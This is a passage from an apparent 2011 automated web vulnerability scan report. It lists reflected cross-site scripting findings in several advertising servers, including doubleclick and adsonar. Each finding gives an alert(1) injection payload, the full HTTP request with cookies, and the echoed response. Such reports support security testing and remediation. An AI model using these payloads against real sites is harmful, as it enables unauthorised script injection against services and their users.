lick%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

3.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eaaa'%3balert(1)//62bc3773dd1 was submitted in the type parameter. This input was echoed as 9eaaa';alert(1)//62bc3773dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/uk.reuters/news/lifestyle/article;type=9eaaa'%3balert(1)//62bc3773dd1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:35:57 GMT
Expires: Mon, 14 Feb 2011 01:35:57 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/a;44306;0-0;0;46373374;39648-768/768;0/0/0;;~okv=;type=9eaaa';alert(1)//62bc3773dd1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d2cc'-alert(1)-'80eb2a6b3f6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/wpni.politics/inlinead;ad=5d2cc'-alert(1)-'80eb2a6b3f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:38:09 GMT
Expires: Mon, 14 Feb 2011 01:43:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/u;236054673;0-0;0;20580498;255-0/0;40598846/40616633/1;;~okv=;ad=5d2cc'-alert(1)-'80eb2a6b3f6;~aopt=2/0/a8/0;~sscs=%3fhttp://www.c-span.org/Series/Washington-Journal/">
...[SNIP]...

3.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdefb"-alert(1)-"6a122e04d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdw3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgs01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 830

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1";
</script>
...[SNIP]...

3.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37aa2"-alert(1)-"5ae84f10ba7 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1b
w4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=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; sglst=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdp3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgl01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:12 GMT
Content-Length: 827

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
3br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7";
</script>
...[SNIP]...

3.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3c3"><script>alert(1)</script>10dcb1064b2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4f3c3"><script>alert(1)</script>10dcb1064b2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX
2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; 
pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C14983%7C15018%7C15003; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 01:34:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:03 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2383879606519371855&fpid=4f3c3"><script>alert(1)</script>10dcb1064b2&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 32ead<script>alert(1)</script>edf430560af was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=190076932ead<script>alert(1)</script>edf430560af&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "190076932ead<script>alert(1)</script>edf430560af"

   
                                                           </head>
...[SNIP]...

3.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload aa72b--><script>alert(1)</script>56c01c56ac8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

